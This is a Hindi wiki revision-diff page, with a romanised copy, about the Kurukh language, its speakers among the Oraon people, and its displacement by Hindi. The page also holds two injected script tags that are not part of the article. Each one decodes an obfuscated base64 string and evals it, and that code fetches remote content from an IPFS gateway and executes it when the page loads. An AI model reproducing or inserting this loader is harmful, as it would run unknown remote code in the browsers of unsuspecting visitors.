Difference between revisions of "कुरुख भाषा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
*कुरुख भाषा [[द्रविड़ निवासी|द्रविड़]] भाषाओं के उत्तरी द्रविड़ उपपरिवार के सदस्यों की [[भाषा]] है।  
+
'''कुरुख भाषा''' द्रविड़ भाषाओं के उत्तरी [[द्रविड़]] उप-परिवार के सदस्यों की [[भाषा]] है। यह भाषा पूर्वी-मध्य [[भारत]] के [[छोटा नागपुर पठार]] में [[उरांव जाति|उरांव जनजाति]] के लगभग 18 लाख लोगों द्वारा बोली जाती है।
*कुरुख भाषा पूर्वी–मध्य [[भारत]] के [[छोटा नागपुर]] पठार में उरांव जनजाति के लगभग 18 लाख लोगों द्वारा बोली गई है।  
+
 
 
*कुरुख भाषा [[बांग्लादेश]] के कुछ हिस्सों में भी बोली जाती है।  
 
*कुरुख भाषा [[बांग्लादेश]] के कुछ हिस्सों में भी बोली जाती है।  
*लिखित परंपरा के अभाव में कुरुख भाषा का प्रलेखन भारत के यूरोपीय उपनिवेशीकण के बाद ही शुरू हुआ था।  
+
*लिखित परंपरा के अभाव में इस भाषा का प्रलेखन भारत के यूरोपीय उपनिवेशीकण के बाद ही शुरू हुआ था।  
*कई क्षेत्रों में [[हिन्दी भाषा]] ने कुरुख भाषा को विस्थापित कर दिया है।  
+
*कई क्षेत्रों में [[हिन्दी भाषा]] ने कुरुख भाषा को विस्थापित कर दिया है।
 
 
  
{{प्रचार}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 14:01, 28 September 2012

kurukh bhasha dravi d bhashaoan ke uttari dravi d up-parivar ke sadasyoan ki bhasha hai. yah bhasha poorvi-madhy bharat ke chhota nagapur pathar mean uraanv janajati ke lagabhag 18 lakh logoan dvara boli jati hai.

  • kurukh bhasha baangladesh ke kuchh hissoan mean bhi boli jati hai.
  • likhit paranpara ke abhav mean is bhasha ka pralekhan bharat ke yooropiy upaniveshikan ke bad hi shuroo hua tha.
  • kee kshetroan mean hindi bhasha ne kurukh bhasha ko visthapit kar diya hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>